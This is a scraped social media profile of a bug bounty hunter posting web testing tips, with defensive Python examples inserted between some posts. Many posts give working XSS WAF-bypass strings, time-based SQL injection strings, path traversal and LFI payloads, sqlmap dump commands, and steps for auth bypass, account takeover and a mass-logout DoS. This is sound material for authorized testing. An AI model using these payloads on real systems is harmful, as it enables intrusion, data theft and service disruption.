🇸🇦 ROOD | GOAT

@0x_rood

Followers
22,913
Following
317
Media
910
Statuses
8,863

My name is rood | born to be bug hunter

Joined November 2018
Pinned Tweet
@0x_rood
🇸🇦 ROOD | GOAT
9 months
2024 goals? - Leaderboards will talk instead of me
7
2
93
@0x_rood
🇸🇦 ROOD | GOAT
1 year
some ways to bypass 403
1- using space symbols
example:
/admin -> 403
/admin%09 -> 200
/admin%20 -> 200
2- use traversal
Example:
/admin -> 403
/..;/admin -> 200
you can fuzz with traversal, sometimes that ends with results
Example: /..;/FUZZ
#bugbountytips #BugBounty
10
304
966
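For the 403 post above, an added defender-side example (not from the original post): it compares an access rule applied to the raw request path with the same rule applied after canonicalization, using the paths quoted in the post. The `/admin` rule, the function names and the normalization steps (path parameters, one percent-decode, whitespace trim, dot segments) are assumptions about a lenient back end.

```python
from urllib.parse import unquote

# Assumed access rule, modelled on the post's /admin example.
PROTECTED_PREFIXES = ("/admin",)


def matches_rule(path: str) -> bool:
    return any(path == p or path.startswith(p + "/") for p in PROTECTED_PREFIXES)


def naive_is_protected(raw_path: str) -> bool:
    """Rule applied to the raw request path, byte for byte."""
    return matches_rule(raw_path)


def canonicalize(raw_path: str) -> str:
    """Reduce a request path to the form a lenient back end may route on."""
    # 1. Drop ";parameter" suffixes from each segment (servlet-style path parameters).
    segments = [seg.split(";", 1)[0] for seg in raw_path.split("/")]
    # 2. Percent-decode once, so %09 and %20 become real whitespace.
    decoded = unquote("/".join(segments))
    # 3. Trim whitespace per segment and resolve "." and "..".
    out = []
    for seg in decoded.split("/"):
        seg = seg.strip(" \t\r\n")
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def hardened_is_protected(raw_path: str) -> bool:
    """Same rule, evaluated on the canonical path."""
    return matches_rule(canonicalize(raw_path))


def audit(paths):
    """Return the paths on which the raw-path rule and the canonical rule disagree."""
    return [p for p in paths if naive_is_protected(p) != hardened_is_protected(p)]


# Constructed sample: the request paths quoted in the post plus one public page.
SAMPLE_PATHS = ["/admin", "/admin%09", "/admin%20", "/..;/admin", "/index.html"]

if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        print(f"{p:12} raw={naive_is_protected(p)} canonical={hardened_is_protected(p)}")
```

Any path returned by `audit` is one where the front-end rule and the application would see different resources, which is the gap to close by enforcing the rule on the canonical path.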
@0x_rood
🇸🇦 ROOD | GOAT
9 months
1- Found login page
2- Intercept POST login request
3- Found parameter called config=
4- Put payload ../../../../../../../../../etc/passwd
5- Successfully read data, and sorry, it's path traversal not LFI
#bugbounty #bugbountytips
13
143
785
@0x_rood
🇸🇦 ROOD | GOAT
8 months
Xss is not easy finding 1- Digging for vulnerable endpoint -> 4 Hours 2- Find parameter with param miner 3- Bypass waf -> 30 mins Payload: "><A%20%252F=""Href=%20JavaScript:k=%27a%27,top[k%2B%27lert%27](origin)> #bugbounty #bugbountytips
14
140
785
@0x_rood
🇸🇦 ROOD | GOAT
9 months
New xss payload to bypass cloudflare WAF, i try it and it’s done for me 👍🏻 <dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x> #bugbounty #bugbountytips
10
148
676
@0x_rood
🇸🇦 ROOD | GOAT
2 years
many people asked me what's my wordlist, i posted 3 times before, now this is last tweet about it
general wordlist:
for PHP:
for asp, aspx:
for java applications:
#bugbountytips
34
273
660
@0x_rood
🇸🇦 ROOD | GOAT
9 months
Sql injection is not necessary inject at payload, You can inject in path
Path: /en/gallery/1
POC: en/gallery/1'XOR(if(now()=sysdate(),sleep(3),0))OR'
#bugbountytips #bugbounty
12
150
639
@0x_rood
🇸🇦 ROOD | GOAT
7 months
1- Found login page in wayback
2- Fuzzing parameter, found parameter called ID
3- Fuzz ID with intruder in burp from 1-10000
4- There's some ID's have different content-length
5- When i use url with these ID's there's JWT in response, then redirect me to account
#bugbountytips
15
99
575
@0x_rood
🇸🇦 ROOD | GOAT
4 months
1- Found path for portal in wayback
2- Fuzz it
3- Found login page
4- Another Fuzzing
5- See /manage-users.php with big content length but 302 status
6- Setup match & replace with 302 to 200
7- Bypass authentication and access to admin panel
#bugbountytips #bugbounty
21
78
563
@0x_rood
🇸🇦 ROOD | GOAT
7 months
CSRF Functions + Bypass Checklist #bugbounty #bugbountytips
4
135
526
@0x_rood
🇸🇦 ROOD | GOAT
9 months
Website block single or double quotation when you test xss? Use this payload </script><svg/onload=alert(0)> #bugbounty #bugbountytips
7
112
526
@0x_rood
🇸🇦 ROOD | GOAT
9 months
Add these endpoints to your wordlist
wp-config.php.old
wp-config.php
#BugBounty
8
75
480
@0x_rood
🇸🇦 ROOD | GOAT
1 year
New tip
1- Fuzz target
2- phpmyadmin/setup/index.php --> 403
3- phpMyAdminOLD/setup/index.php --> 200
add phpMyAdminOLD/setup/index.php to your wordlist
#bugbounty #bugbountytips
12
108
440
@0x_rood
🇸🇦 ROOD | GOAT
1 year
1- Login with successful password (save response body to use it)
2- logout then copy response that's for successful login attempt
3- paste json body in wrong attempt response
4- your login successfully = ATO
Note: there's no cookie or token, it's just normal body
#BugBountytips
30
79
424
@0x_rood
🇸🇦 ROOD | GOAT
8 months
Google Dorks for recon
site:*.google.*
site:google.*
site:*.google.com
site:*.google.-*.* -> (good results)
#bugbounty #bugbountytips
2
96
425
@0x_rood
🇸🇦 ROOD | GOAT
1 year
Session Hijacking testing steps
1. Login your account
2. Use cookie editor extension in browser
3. Copy all the target cookies
4. Logout your account
5. Paste those cookies in cookie editor extension
6. Refresh page, if you are logged in then this is a session hijacking
#bugbountytips
13
104
419
@0x_rood
🇸🇦 ROOD | GOAT
2 years
1- found port 8888 open at shodan
2- login panel
3- fuzz and found /api
4- this endpoint have section called password that's have username and password but password encrypted with jwt
5- decrypt password in
6- access to dashboard
#bugbountytips #bugbounty
14
81
412
@0x_rood
🇸🇦 ROOD | GOAT
2 years
Payload: //....//....//....//....//....//....//....//....//....//etc/passwd
Parameter: path=
#bugbountytips #BugBounty
12
84
405
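For the two path traversal posts (the `config=` parameter and the `path=` parameter above), an added example, not from the original posts, of the server-side containment check that rejects both payloads. The single-pass `../` filter in `strip_once` is an assumption used only to show why stripping is not a fix; the posts do not say how the targets handled the value, and the function names and base directory are hypothetical.

```python
import os
from pathlib import Path

# The two parameter values quoted in the posts.
PLAIN = "../" * 9 + "etc/passwd"
DOTTED = "//" + "....//" * 9 + "etc/passwd"


def strip_once(value: str) -> str:
    """Single-pass '../' removal (assumed filter, shown as the weak pattern)."""
    return value.replace("../", "")


def naive_open_path(base: Path, value: str) -> str:
    """Filter, then concatenate: the result is never checked against base."""
    return os.path.normpath(str(base) + "/" + strip_once(value))


def resolve_under(base: Path, value: str) -> Path:
    """Resolve value against base and refuse anything that lands outside it."""
    base = base.resolve()
    # An absolute value replaces base entirely here, so it fails the check below.
    candidate = (base / value).resolve()
    try:
        candidate.relative_to(base)
    except ValueError:
        raise ValueError(f"path escapes {base}: {value!r}") from None
    return candidate


if __name__ == "__main__":
    import tempfile

    base = Path(tempfile.mkdtemp()).resolve()  # stand-in for the config directory
    print("filtered DOTTED  :", strip_once(DOTTED))
    print("naive, PLAIN     :", naive_open_path(base, PLAIN))
    print("naive, DOTTED    :", naive_open_path(base, DOTTED))
    for value in ("themes/dark.json", PLAIN, DOTTED):
        try:
            print("accepted         :", resolve_under(base, value))
        except ValueError as exc:
            print("rejected         :", exc)
```

The filter stops the plain payload but turns each `....//` into `../`, while `resolve_under` decides on the final resolved location and so does not depend on the spelling of the input.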
@0x_rood
🇸🇦 ROOD | GOAT
1 year
Some websites to check broken links to find broken link hijacking vulnerabilities 1- 2- 3- #bugbountytips #BugBounty
5
117
399
@0x_rood
🇸🇦 ROOD | GOAT
1 year
@eLearnSecurity labs are now available for free:
- Networking
- The offensive and defensive sides of cybersecurity
- CVE vulnerabilities
- Cloud, such as Azure, AWS and Google Cloud
The labs are useful for anyone who wants to train to get a certification from them or to strengthen themselves in cybersecurity
Retweet so others benefit
0
84
384
@0x_rood
🇸🇦 ROOD | GOAT
10 months
Another sql injection payload:
14)%20AND%20(SELECT%207415%20FROM%20(SELECT(SLEEP(10)))CwkU)%20AND%20(7515=7515
#bugbountytips #BugBounty
4
104
387
@0x_rood
🇸🇦 ROOD | GOAT
1 year
CVE-2021-40875 POC
1- go to : https://test. com/files.md5
2- this path show you all files in servers
3- you should find this file /db/sqlsrv/full.sql
4- file have Sensitive data & Client id & secret
5- report it as High/Critical
#bugbounty #bugbountytips
6
89
383
@0x_rood
🇸🇦 ROOD | GOAT
2 years
nuclei templates collection #bugbountytips #BugBounty
19
174
375
@0x_rood
🇸🇦 ROOD | GOAT
2 years
$5000 bounty Today is different, I’m the GOAT of this game #bugbounty @Bugcrowd
24
16
357
@0x_rood
🇸🇦 ROOD | GOAT
1 year
I swear to God I still can't believe what I'm seeing, I'm ninth in the world in critical vulnerabilities, praise be to you, Lord 😭 #BugBounty
51
5
355
@0x_rood
🇸🇦 ROOD | GOAT
2 years
I’m not using tools for recon part but in last days i found perfect tool for subdomain enumeration i seen it in @GodfatherOrwa live and try it, it’s beautiful tool #bugbountytips #BugBounty
9
85
339
@0x_rood
🇸🇦 ROOD | GOAT
2 years
Best 5 repositories for bug hunters and penetration tester | Thread #bugbounty #bugbountytips #infosec
29
136
341
@0x_rood
🇸🇦 ROOD | GOAT
2 years
Ok, let's discuss this
1- fuzz website
2- found this path /jk_status?cmd=dump = dump data
3- search more about this misconfigure
4- found /jk_status?opt=0 = read and write privilege
#BugBounty #bugbountytips
7
94
330
@0x_rood
🇸🇦 ROOD | GOAT
3 years
1- use ffuf in subdomain
2- /phpldapadmin/ -> 200 ok
3- admin login page
4- try to access admin panel
5- see check box (anonymous login)
6- access with anonymous and read privileges
7- triaged report with high severity 😎
#bugbountytips #BugBounty
12
93
326
@0x_rood
🇸🇦 ROOD | GOAT
20 days
1- here's IDOR leaks PII and parameter called "reset_code"
2- Use victim email in reset password -> It will request OTP from you
3- Back to IDOR request, response was leak reset_code
4- Use it for account takeover
#bugbounty #bugbountytips
7
44
333
@0x_rood
🇸🇦 ROOD | GOAT
1 year
Regex to detect secrets from files "(?i)(([a-z0-9]+)[-|_])?(key|password|passwd|pass|pwd|private|credential|auth|cred|creds|secret|access|token)([-|_][a-z]+)?(\\s)*(:|=)+" #infosec #bugbountytips
4
75
324
@0x_rood
🇸🇦 ROOD | GOAT
3 years
Thread: What is Docker? If you're busy, favorite it or come back to it later
2
21
320
@0x_rood
🇸🇦 ROOD | GOAT
2 years
Nothing new,
1- full scan ports with naabu
2- port 9000 is open
3- open website
4- access to sonarqube and found secrets without authentication
5- Good night
#BugBounty #BugBounty
11
53
317
@0x_rood
🇸🇦 ROOD | GOAT
1 month
Finding of this day IDOR in cookie, when I change ID it's take me directly to another user account Browser Extension for cookie: #bugbountytips #bugbounty
7
33
322
@0x_rood
🇸🇦 ROOD | GOAT
1 year
TOP 10 SSRF parameters
?dest={target}
?redirect={target}
?uri={target}
?path={target}
?continue={target}
?url={target}
?window={target}
?next={target}
?data={target}
?site={target}
#bugbountytips #BugBounty
0
69
312
@0x_rood
🇸🇦 ROOD | GOAT
2 years
one line to get admin login page or panel
cat domains_list.txt | httpx -ports 80,443,8080,8443 -path /admin -mr "admin"
#bugbountytips #bugbounty
11
96
305
@0x_rood
🇸🇦 ROOD | GOAT
3 years
/api/v1/user/18739 = 403
/api/v2/user/18739 = 200 success
Tip: try to change api version
#bugbountytips
12
45
307
@0x_rood
🇸🇦 ROOD | GOAT
2 years
1- found server in shodan with ibm http server 8.5.5
2- search on google about cve's on it
3- found CVE-2020-4463 XXE and pii leak
4- search exploit on github
5- exploit it
6- the rest servers i found it on shodan then test it directly
#bugbountytips #bugbounty
11
65
306
@0x_rood
🇸🇦 ROOD | GOAT
10 months
Interesting finding:
1- Found application for website
2- Logout and found this endpoint at burp api/logout/My_id
3- So here we have idor at logout
4- Make script with chatgpt that's take loop on all Users id
5- Dos attack to immobilize all users
#bugbountytips #bugbounty
14
38
305
@0x_rood
🇸🇦 ROOD | GOAT
11 months
Bypass email verification
1- Create 2 accounts, one you have access on email and another you don't have email on it
2- After verify first account, it take you to create password
3- Change email to second account you don't have email access
4- Bypass it.
#bugbountytips #BugBounty
@0x_rood
🇸🇦 ROOD | GOAT
11 months
It’s time to take rest and play Fortnite, Tips will be tomorrow #bugbounty
7
7
132
7
49
303
@0x_rood
🇸🇦 ROOD | GOAT
2 years
How I got a $10,000 Penetration Testing Project/Job with Bug Bounty #BugBounty #bugbountytips
7
63
297
@0x_rood
🇸🇦 ROOD | GOAT
3 years
P1 in 5 minutes
1- subdomain enumeration
2- see interesting sub
3- fuzzing with dirsearch
4- see this path /adminer with login page
5- use default credentials root/root
6- full access to database management portal 😎
#bugbountytips #bugbountytip
12
82
296
@0x_rood
🇸🇦 ROOD | GOAT
10 months
Time sleep sql injection
Payload: 'XOR(if(now()=sysdate(),sleep(33),0))OR'
#bugbounty #bugbountytips
2
71
301
@0x_rood
🇸🇦 ROOD | GOAT
2 years
Warming up for today Payload: %27%3E%3Ca/+/OnMOuSeOvER%0d=%0dconfirm(document.cookie)%3Ev3dm0s #BugBounty #bugbountytips
6
70
291
@0x_rood
🇸🇦 ROOD | GOAT
1 year
Crunchbase is important tool in recon process and it's paid tool, but i have simple trick to see all acquisitions for any company, it's google dork
Example:
site:*.crunchbase.com "acquired by yahoo"
#bugbountytips #bugbounty
5
75
293
@0x_rood
🇸🇦 ROOD | GOAT
9 months
Nice tip from @apt511_
if you have mssql and you want to make POC with sqlmap you can add --dbms mssql
Command: sqlmap -u https://test\com/endpoint/./asp --dbs --random-agent --time-sec=12 --level=1 --risk=1 --batch --dbms mssql
#bugbountytips #bugbounty
@0x_rood
🇸🇦 ROOD | GOAT
9 months
@ZX795385344 Well done, sheikh, thank you for these tips ❤️❤️❤️❤️
1
0
3
5
67
292
@0x_rood
🇸🇦 ROOD | GOAT
2 years
wait wait, who's back?
first it's webmail page
- fuzzing the site get /adminconsole/ it's admin login page
- /adminconsole/FUZZ
- get /adminconsole/install.htm
- they take me to settings page that's disclose admin pass and sql info
- admin panel pwn
#bugbountytips #bugbounty
15
56
285
@0x_rood
🇸🇦 ROOD | GOAT
1 year
Best tool in:
Parameters discovery: Arjun, Paraminer
Subdomain Enum: securitytrails
Fuzzing: ffuf
Vulnerabilities discovery: nuclei
Xss detection: XSStrike
#bugbountytips #BugBounty
6
67
278
@0x_rood
🇸🇦 ROOD | GOAT
9 months
Big thanks guys for help
If the second parameter is vulnerable and you want to test it, copy request from burp then put it in sqlmap
command: sqlmap -r request.txt --dbs --random-agent --time-sec=12 --level=1 --risk=1
don't forget to put * at parameter value
#bugbountytips
@0x_rood
🇸🇦 ROOD | GOAT
9 months
Guys, i have link with 2 parameters, second parameter is vulnerable to sqli but when i choose it with -p it doesn't work, they test just first parameter, what should i do?
6
1
31
11
55
281
@0x_rood
🇸🇦 ROOD | GOAT
2 months
Praise be to God 🙏🙏 #BugBounty
19
3
283
@0x_rood
🇸🇦 ROOD | GOAT
2 years
Endpoint: /phpmyadmin/scripts/setup.php #bugbountytips #BugBounty
8
39
276
@0x_rood
🇸🇦 ROOD | GOAT
2 years
Cool Recon techniques every hacker misses! #bugbounty #bugbountytips
12
79
278
@0x_rood
🇸🇦 ROOD | GOAT
4 months
🫶🫶
15
3
278
@0x_rood
🇸🇦 ROOD | GOAT
11 months
Most weird bug that i discovered
Part 1
1- admin login page, put any credentials and change response from 422 to 200 OK
2- it login me to empty panel then after 2 seconds redirect me to login page
#bugbountytips #bugbounty
4
37
275
@0x_rood
🇸🇦 ROOD | GOAT
1 year
Here's resources that help me to exploit this issue
1- this tool help me to dump docker images
2- Read disclosed reports at hackerone that have same situations, it's help me to know impact and how to exploit it
3- make poc & report it
#bugbountytips
4
62
270
@0x_rood
🇸🇦 ROOD | GOAT
2 years
I will explain my port scanning method
Note: you need shodan plugin and naabu tool
1- visit website, when i see different ports in shodan opening except 80,443
2- directly i will make full port scanning
3- naabu -host “ip or domain here” -p -
#bugbountytips #BugBounty
8
60
264
@0x_rood
🇸🇦 ROOD | GOAT
1 year
Regex code to detect possible idor parameters "(?i)(\\?|\\&)(((([a-z0-9-_])+(-|_)+))|(-|_))?(id|uuid|user|account|number|order|no|doc|key|email|group|profile|edit|report|username)((=)|(\\/[0-9]+\\/?))" #infosec #bugbountytips
5
67
268
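The two regexes the author posted (secret detection earlier on the page and IDOR-parameter detection above), as an added example that is not part of the original posts: both are run over constructed input to show what they flag when reviewing your own config files and route inventory. The doubled backslashes of the posted string-literal form are reduced for Python raw strings and `(?i)` becomes `re.I`; the strict variant with a leading lookbehind, the function names and all sample lines are assumptions added here.

```python
import re

# Body of the posted secrets regex ((?i) is applied through re.I below).
SECRET_BODY = (
    r"(([a-z0-9]+)[-|_])?(key|password|passwd|pass|pwd|private|credential|auth"
    r"|cred|creds|secret|access|token)([-|_][a-z]+)?(\s)*(:|=)+"
)
SECRET_RE = re.compile(SECRET_BODY, re.I)
# Added refinement (not from the post): the name must not start mid-word.
SECRET_STRICT_RE = re.compile(r"(?<![a-z0-9])" + SECRET_BODY, re.I)

# The posted IDOR-parameter regex.
IDOR_RE = re.compile(
    r"(\?|\&)(((([a-z0-9-_])+(-|_)+))|(-|_))?(id|uuid|user|account|number|order"
    r"|no|doc|key|email|group|profile|edit|report|username)((=)|(\/[0-9]+\/?))",
    re.I,
)


def scan_secrets(lines, strict=False):
    """Return 1-based numbers of lines that look like a credential assignment."""
    rx = SECRET_STRICT_RE if strict else SECRET_RE
    return [n for n, line in enumerate(lines, 1) if rx.search(line)]


def idor_params(urls):
    """Map each URL that carries an object-reference parameter to that parameter."""
    hits = {}
    for url in urls:
        m = IDOR_RE.search(url)
        if m:
            hits[url] = m.group(0).lstrip("?&").rstrip("=")
    return hits


# Constructed samples (no real secrets or endpoints).
CONFIG_LINES = [
    'DB_PASSWORD = "constructed-value"',
    "api_key: constructed-value",
    "aws_secret_access_key=constructed-value",
    "monkey = banana",        # false positive of the posted regex: "key ="
    "timeout: 30",
    "# author: jane",
]
URLS = [
    "/account/settings?id=1042",
    "/orders/export?order_id=77&format=csv",
    "/profile?tab=info&uuid=9f1c",
    "/search?q=shoes&page=2",
    "/video?hide=1",
]

if __name__ == "__main__":
    print("posted regex :", scan_secrets(CONFIG_LINES))
    print("strict regex :", scan_secrets(CONFIG_LINES, strict=True))
    for url, name in idor_params(URLS).items():
        print(f"review authorization on {name!r}: {url}")
```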
@0x_rood
🇸🇦 ROOD | GOAT
2 years
Here's my last finding (P1)
1- register account
2- intercept request
3- here's the response in image, so in "role" parameter we have ROLE_USER
So i don't know what i can replace it to privilege my account to admin
4- open source code and look in js files
5- PART 2
#bugbountytips
10
59
262
@0x_rood
🇸🇦 ROOD | GOAT
3 years
Improper access control in 5 minutes
1- use ffuf in your target
2- phpMyAdmin/ —> 200 ok
3- phpmyadmin login page
4- add /setup to your link
5- phpmyadmin/setup/
6- when you are lucky you can see setup new servers page
Medium - high bug
#bugbountytips
13
70
265
@0x_rood
🇸🇦 ROOD | GOAT
2 years
Recon power
1- collect acquisitions
2- find ASN
3- reverse whois
4- use Shodan
5- subdomain enum + brute force
6- port scanning
7- fuzzing
8- GitHub dorking
Credit: The Bug Hunter's Methodology v4 @Jhaddix
#bugbountytips #infosec
4
86
260
@0x_rood
🇸🇦 ROOD | GOAT
2 years
1- found port 5000 opened with shodan chrome extension
2- found admin panel
3- username: admin password: admin
4- access to admin portal 👽
#bugbountytips #BugBounty
11
29
259
@0x_rood
🇸🇦 ROOD | GOAT
2 years
1- intercept request
2- login
3- when I forward between requests
4- i found request on path that's called /users/permissions
5- do intercept > response on this request
6- i found ("admin", "false", admin_id "0")
7- i change false to true and 0 to 1
8- privilege ✅
#bugbountytips
3
64
258
@0x_rood
🇸🇦 ROOD | GOAT
10 months
1- Go to support forum
2- There's some inputs like name, email, message
3- Put victim email in input
4- Intercept request
5- You will see 2 hidden parameters in burp for sender mail & cc mail for employees
6- So you can send mails from official emails to anyone
#bugbountytips
8
56
253
@0x_rood
🇸🇦 ROOD | GOAT
9 months
Top 1 at @Hacker0x01 in critical vulnerabilities
12
3
253
@0x_rood
🇸🇦 ROOD | GOAT
2 years
Idor leads to ATO
1- register on website
2- in account settings we have parameter called ID, it's have normal id
3- I'm register second account
4- change email and id for second account
5- email changed successfully
6- reset password then takeover
#bugbountytips #bugbounty
9
43
251
@0x_rood
🇸🇦 ROOD | GOAT
1 year
Website have function to create and share jobs
1- create job but don't share it
2- start burp and intercept request
3- change job ID to another ID
4- they will delete job that's linked with ID and share your job
that's called overwrite misconfiguration
#bugbountytips #bugbounty
2
47
248
@0x_rood
🇸🇦 ROOD | GOAT
2 years
in this month I'm get 4 bounties from this bug
Steps to reproduce
1- capture reset password request
2- send it to intruder
3- repeat request 50 times
4- if you get 50 message in your email (reset password) you can report it
#BugBounty #bugbountytips
18
48
247
@0x_rood
🇸🇦 ROOD | GOAT
3 months
Found path in source code that’s accessing me direct to admin panel #BugBounty
12
6
246
@0x_rood
🇸🇦 ROOD | GOAT
7 months
CVE-2022-0412 is time based sql injection but you can extract databases with this command
sqlmap./py -r request./txt --dbs --random-agent --time-sec=12 --level=5 --risk=3 --batch --flush-session
#bugbounty #bugbountytips
4
60
245
@0x_rood
🇸🇦 ROOD | GOAT
1 year
SendGrid key starts with: SG.xxxxxxxxxxxx
Curl command to create POC:
curl -X "GET" "" -H "Authorization: Bearer SENDGRID_TOKEN-HERE" -H "Content-Type: application/json"
_______
You can find it in mobile apps & js files
#bugbountytips #BugBounty
3
70
245
@0x_rood
🇸🇦 ROOD | GOAT
9 months
This bypass still working, impressive
@0x_rood
🇸🇦 ROOD | GOAT
9 months
New xss payload to bypass cloudflare WAF, i try it and it’s done for me 👍🏻 <dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x> #bugbounty #bugbountytips
10
148
676
2
39
240
@0x_rood
🇸🇦 ROOD | GOAT
1 year
Common methods to find API endpoints
1- Swagger UI Documentation
2- Dictionary Attack | Brute force
3- Common wordlist for API Enum :
#bugbountytips #BugBounty
1
72
234
@0x_rood
🇸🇦 ROOD | GOAT
2 years
1- phpmyadmin setup is enabled
2- kanboard is login page on port 45001 with admin:admin credentials
3- Good morning
#BugBounty #bugbountytips
13
30
235
@0x_rood
🇸🇦 ROOD | GOAT
2 months
Another 9.8 🎯 with @badcrack3r #BugBounty
11
3
228
@0x_rood
🇸🇦 ROOD | GOAT
1 year
POC tip
1- fuzz target and found /files.md5
2- this file include all files path in server
3- found this path /db/sqlsrv/full.sql
4- this sql file have client ID & secret
#BugBounty #bugbountytips
@0x_rood
🇸🇦 ROOD | GOAT
1 year
And full stop, end of line 👌🏻
7
0
55
12
45
228
@0x_rood
🇸🇦 ROOD | GOAT
9 months
Some priv esc issues
Part 1
1- Invite User to your org, then accept invite and try to change email -> P4/P3
2- Invite user but before accept invite delete it, then go to email and accept it, if user added successfully report it P3
#bugbounty #bugbountytips
11
43
228
@0x_rood
🇸🇦 ROOD | GOAT
3 years
Thread: Types of bug bounty programs
Note: if you're busy, add it to your favorites and come back to it when you're free
2
19
212
@0x_rood
🇸🇦 ROOD | GOAT
1 year
1- Found endpoint in waybackurls: /core/Filemanager/index.html?type=Images&CKEditor=full_story&CKEditorFuncNum=110&langCode=en
2- upload any file
3- intercept request, in body they show default path for uploading files
4- change it to any directory
#bugbountytips #BugBounty
8
45
222
@0x_rood
🇸🇦 ROOD | GOAT
2 years
Thread: The story of the Uber hack #Cybersecurity
8
13
219
@0x_rood
🇸🇦 ROOD | GOAT
1 year
If you found /actuator/jolokia/ endpoint in your target you can escalate it to LFI POC: https://target[.]com/actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
5
72
221
@0x_rood
🇸🇦 ROOD | GOAT
7 months
Using XSS to Create a Keylogger
0
51
220
@0x_rood
🇸🇦 ROOD | GOAT
1 year
1- Fuzz target
2- found /upload path
3- directory listing enabled
4- one of files name was 1-247.csv
5- disclosure more than 30k PII
#bugbountytips #bugbounty
11
32
210
@0x_rood
🇸🇦 ROOD | GOAT
5 months
Tips for ssrf
- Just extract endpoints from waymore
- See endpoint called Imageurl=
- Test Burp collab url (You can see response in burp because it's Image content type)
- Then advance exploit
- Found 5 Hosts vulnerable with same endpoint
#bugbountytips
@0x_rood
🇸🇦 ROOD | GOAT
5 months
Morning findings #BugBounty
9
2
124
4
35
220
@0x_rood
🇸🇦 ROOD | GOAT
1 year
Best resources for learning web application penetration testing (Arabic edition)
1-
2-
3-
4-
#bugbounty #bugbountytips
6
33
209
@0x_rood
🇸🇦 ROOD | GOAT
3 years
1- find subdomain with
2- see interesting url
3- full port scan
4- port 3001 | open
5- grafana admin portal
6- use default credentials admin:admin
7- success login to admin portal
#bugbountytips
@0x_rood
🇸🇦 ROOD | GOAT
3 years
On fire today 🤟🏼
12
6
74
5
46
211
@0x_rood
🇸🇦 ROOD | GOAT
1 year
1- find subdomain: cms. compny. com
2- sign in/up page
3- sign up new account
4- login
5- i have full privileges and leak all PII for customers 🌚
#bugbountytips #BugBounty
3
27
214
@0x_rood
🇸🇦 ROOD | GOAT
3 years
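Guys, I have an idea I'll do instead of the live streams, with benefit for me and for you: I record bug hunting, but not live, a clip of about two hours, and I'll upload it to a platform other than YouTube so it doesn't get deleted and stays saved forever. That way I also don't get stressed while I'm testing and can take my time. The video will be without sound because it's hard to explain for the whole two hours while I'm testing. What do you think?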
33
3
200
@0x_rood
🇸🇦 ROOD | GOAT
2 years
live bug bounty recon at apple - part 1
8
58
205
@0x_rood
🇸🇦 ROOD | GOAT
19 days
The new PC starts
13
6
210
@0x_rood
🇸🇦 ROOD | GOAT
2 years
1- visit website
2- fuzz with default list
3- found /admin.tar.gz
4- extract files and found sensitive data
Easy find, but not dup
#BugBounty #bugbountytips
12
40
203
@0x_rood
🇸🇦 ROOD | GOAT
2 months
Happy to announce this, i'm most impactful hacker at Critical Reputation on @Hacker0x01 in 2024 Until now #BugBounty
17
3
204
@0x_rood
🇸🇦 ROOD | GOAT
1 year
Nothing unique here
1- found acquisition from google
2- found main domain for acquisition
3- waybackurl
4- endpoint leads me to signup new admin account
5- add/edit/delete privileges
#bugbountytips #BugBounty
6
29
198
@0x_rood
🇸🇦 ROOD | GOAT
1 year
Good list to discover new paths #bugbountytips #BugBounty
3
42
197